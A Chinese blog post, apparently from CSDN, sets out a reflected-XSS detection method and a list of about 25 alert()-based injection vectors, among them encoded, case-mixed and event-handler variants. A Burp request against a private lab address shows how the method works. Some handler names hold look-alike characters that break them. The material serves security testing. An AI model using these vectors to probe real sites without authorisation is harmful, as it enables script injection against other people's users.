反射型跨站脚本攻击测试用例

最新推荐文章于 2024-07-01 14:52:34 发布
最新推荐文章于 2024-07-01 14:52:34 发布
阅读量4.1k 收藏 4
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rulerer/article/details/80708205
版权

1)  检测方法:

爬取get页面,将测试向量<script>alert(a1b2c3d4e5)</script>逐个依次代入url参数

返回页面响应码200,并且能在返回页面中检测到字符串<script>alert(a1b2c3d4e5)</script>

2)  测试向量:

注入

返回

%3E%22%27%3E%3Cscript%3Ealert%289776%29%3C%2Fscript%3E

<script>alert(9776)</script>

<script>alert(1214)</script>

<script>alert(1214)</script>

;</script><script>alert(1350)</script>

<script>alert(1350)</script>

%3Cscript%3Ealert%28514%29%3C%2Fscript%3E

<script>alert(514)</script>

"/><script>alert(10364)</script>

<script>alert(10364)</script>

";</script><script>alert(1300)</script>

<script>alert(1300)</script>

%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%286431%29%3C%2Fscript%3E

<script>alert(6431)</script>

%22onmouseover%3D%22alert%281101%29%22

οnmοuseοver="alert(1101)"

%22%20οnmοuseοver=%22alert%283870%29%22%20

οnmοuseοver="alert(3870)"

-->";</script><script>alert(6837)</script>

<script>alert(6837)</script>

;;"";;alert(3868);;

alert(3868)

--%3E%3C/script%3E%3Cscript%3Ealert(3880)%3C/script%3E

<script>alert(3880)</script>

%00--%3E%3C/script%3E%3Cscript%3Ealert(3882)%3C/script%3E

<script>alert(3882)</script>

%3Cscript%3Ealert(3884)%3C/script%3E

<script>alert(3884)</script>

%3cimg%20src%3d%22javascript%3aalert(3888)%22%3e

alert(3888)

%253E%2527%2522%253E%253Cscript%253Ealert%25283907%2529%253C%252Fscript%253E

<script>alert(3907)</script>

<script>alert(String.fromCharCode(88,83,83))</script>

<script>alert(String.fromCharCode(88,83,83))</script>

<scRipt>alert(123)</scriPt>

<scRipt>alert(123)</scriPt>

<s<script>cript>alert(123)</s</script>cript>

<script>alert(123)</script>

<img src=1 οnerrοr=alert(123)>

<img src=1 οnerrοr=alert(123)>

<script>prompt(123)</script>

<script>prompt(123)</script>

"method="POST"><script>alert(123)</script>

"method="POST"><script>alert(123)</script>

" οnsubmit="alert('123')

" οnsubmit="alert('123')


3)  示例:

访问链接:http://192.168.2.160/xss_kuazhan/xss_get1.php?username=test

并使用brupsuite抓取数据包请求头

GET /xss_kuazhan/xss_get1.php?username=testHTTP/1.1

Host: 192.168.2.160

User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Referer: http://192.168.2.160/

DNT: 1

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0

修改参数username值为username=<script>alert(a1b2c3d4e5)</script>,发送数据包,浏览器弹框显示a1b2c3d4e5


RuleZero
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络攻防】“跨站脚本攻击“ 第一弹 ——反射XSS
翼安研习社的博客
01-28 2393
撰稿|谢泳 编辑|王聪丽 信息收集|谢泳** 目录1. 初识XSS2. 反射XSS2.1 Cookie劫持2.2 Get请求2.3 Post请求3. 防御方式 1. 初识XSS 跨站脚本攻击(Cross Site Script, XSS)是利用web前端代码注入来篡改页面,执行恶意脚本,达到窃取数据、冒充身份等目的的攻击方法。 浏览器根据HTML代码解析页面,现在的HTML中可以有很多JavaScript脚本,XSS攻击则是利用前端代码的漏洞,插入恶意代码。 XSS攻击者必须有一定的JavaScri.
XSS 跨站脚本检测,常见攻击手段——反射
weixin_30337251的博客
07-16 702
简而言之,XSS就是黑客通过利用web服务器漏洞从而向我们的客户端浏览器发送恶意代码,客户端进而执行恶意代码(javascript等脚本语言),向黑客发送有关自己的信息(盗取cookie,重定向等等) XSS漏洞类: 存储:攻击脚本会被永久的保存在目标服务器的数据库或者文件中(黑客会在某论坛进行留言,此时论坛对应的服务器会将黑客的留言保存在服务器,但是留言的内容有XS...
Web安全测试之XSS实例讲解
最新发布
软件测试技术交流分享
07-01 911
XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。
跨站脚本攻击反射)笔记(四)——较罕见的操作
weixin_30924239的博客
07-19 178
  正常的请求,则正常响应出页面html。      我们大部分情况下插入的xss代码,基本上都在参数值上!而今天举得例子在路径上! 先尝试在路径上添加123: 响应: 出现了输入对应的输出,本来挖掘跨站就是要挖掘输入对应是否输出的位置。 所以,直接上xss语句测试。 相对应的,响应成功弹出弹窗。 这种是比较罕...
DVWA-Xss(reflected)(反射跨站脚本攻击
简简的博客
02-02 1712
本系列文集:DVWA学习笔记 反射Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
Kali渗透测试之DVWA系列4——反射XSS(跨站脚本攻击)
浅浅的博客
05-11 3970
目录 一、XSS 1、XSS简介 2、XSS类 3、漏洞形成的根源 二、反射XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
webProject:具有XSS,SQL注入和Croos站点请求伪造的跨站点脚本
03-04
反射XSS,脚本是通过URL参数传递的;以及DOMXSS,攻击者修改了页面的DOM(文档对象模)来执行脚本。`webProject`可能包含了演示这三种类XSS攻击的实例,并提供了防止这些攻击的安全编码实践。 **CSRF(跨站...
基于Java反射的APP自动化混合测试框架的研究与实现.zip
10-16
- **测试脚本生成器**:根据应用程序的源代码自动生成测试用例,利用反射动态生成针对特定方法和字段的测试代码。 - **模拟器和真机测试**:结合使用模拟器和真实设备进行测试,以确保在不同环境下的兼容性。 - **...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
**XSS跨站脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
anquan安全测试内容文档文档文档
10-29
#### 四、跨站脚本攻击(XSS)类及其防御 1. **反射XSS**:依赖于用户点击恶意链接触发攻击。 2. **存储XSS**:攻击者提交的恶意脚本会被服务器存储,之后加载给每个访问该页面的用户。 3. **DOM-Based XSS**:...
Gloryroad_robotium源码
12-08
5. **跨越Activity测试**:Robotium能够跟踪Activity的切换,使得测试脚本可以跨Activity执行,非常适合测试应用的导航流程。 6. **回放功能**:Robotium支持回放测试,方便开发者检查测试过程和调试问题。 7. **...
XSS跨站脚本攻击在Java开发中防范的方法
01-09
XSS跨站脚本攻击在Java开发中防范的方法
xss反射post_反射跨站脚本攻击(XSS)
weixin_39974030的博客
01-27 362
反射的XSS为前段提交的数据不存储在后端数据库或者存储中,直接经过后端代码处理在前段显示出来而和DOM的区别是输出的信息是由后端来处理的,而不是前端js直接修改html,相同则为数据都到了后端所以反射的xss又称之为非存储xssDVWA测试防护等级:低header("X-XSS-Protection:0");//Isther...
反射xss(跨站脚本攻击
EdisonJH的博客
07-12 8778
反射xss(跨站脚本攻击) 通常人们会把跨站脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把跨站脚本攻击缩写为xss。 xss原理:其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站...
java反射跨站脚本攻击_Web安全之防止XSS跨站脚本攻击
weixin_32589453的博客
02-24 1077
XSS攻击全称跨站脚本攻击(Cross-site scripting),为和CSS区别,改为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意的web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。XSS攻击的产生原因是对外部输入的参数没有做严格过滤,导致输入参数直接参与页面源代码,相当于页面源代码可以被外部修改,因此可能被改变页面结构、植...
url存在宽字节跨站漏洞_漏洞那些事er 反射跨站脚本攻击
weixin_39640543的博客
12-10 605
跨站脚本攻击(Cross Site Scripting,缩写为XSS)本质上仍是注入攻击的一种。当实施此类攻击时,攻击者通过直接或间接的方式,向WEB应用提交包含恶意代码数据,而WEB应用未对提交数据进行合法性验证或转义处理,最终致使恶意代码在被攻击者的浏览器中执行。 跨站脚本是所有WEB应用安全漏洞中最常见的一种,一些安全公司的统计数据显示,其数量占据了WE...
反射XSS跨站脚本攻击和防御
认知 行动 坚持
07-05 6129
在前面的文章中,讲述了最好懂的存储XSS攻击和防御,本文来聊聊反射XSS,所谓反射,就像镜子一样,一束光发过去,立即弹回来。这里依赖于微博服务器存在反射XSS漏洞。那么,坏人C为什么不自己搭建一个反射服务器进行反射呢? 这是个好问题。以js获取cookie为例,如果坏人C自己搭建反射服务器,那么很显然document.cookie就无法获取好人A的微博cookie,所以,还是要用微博服务器做反射,这样才能获取好人A的微博cookie,从而进行攻击。
2019-3-4 dvwa学习(6)--反射XSS攻击
weixin_42555985的博客
03-04 1952
什么是反射XSS攻击(Reflected XSS Attacks)? 先来解释一下反射XSS攻击的过程:攻击者把恶意代码注入到正常的URL之中,然后把带有恶意代码的URL通过邮件或者其他网站链接形式发送给用户。当用户被诱骗点击恶意链接、提交精心设计的表单,甚至浏览恶意网站时,注入的代码会传到易受攻击的网站服务器。服务器端接收数据处理后,再把带有恶意代码的数据返回用户的浏览器。由于数据来自可信网...
Web安全之XSS跨站脚本攻击
brizer的博客
08-26 6623
本文主要选择常见web攻击手段之一的XSS(跨站点脚本攻击)来进行讲解,说明其攻击原理,并提出相应的解决办法。XSSXSS 攻击,全称是“跨站点脚本攻击”(Cross Site Scripting),之所以缩写为 XSS,主要是为了和“层叠样式表”(Cascading Style Sheets,CSS)区别开,以免混淆。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代
simulink 测试用例脚本
12-09
要使用 Simulink 测试用例脚本,首先需要在 Simulink 中创建一个测试套件,并将要测试的模和相应的测试用例添加到测试套件中。然后,可以编写测试用例脚本来定义测试条件和期望结果。在测试用例脚本中,可以使用 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值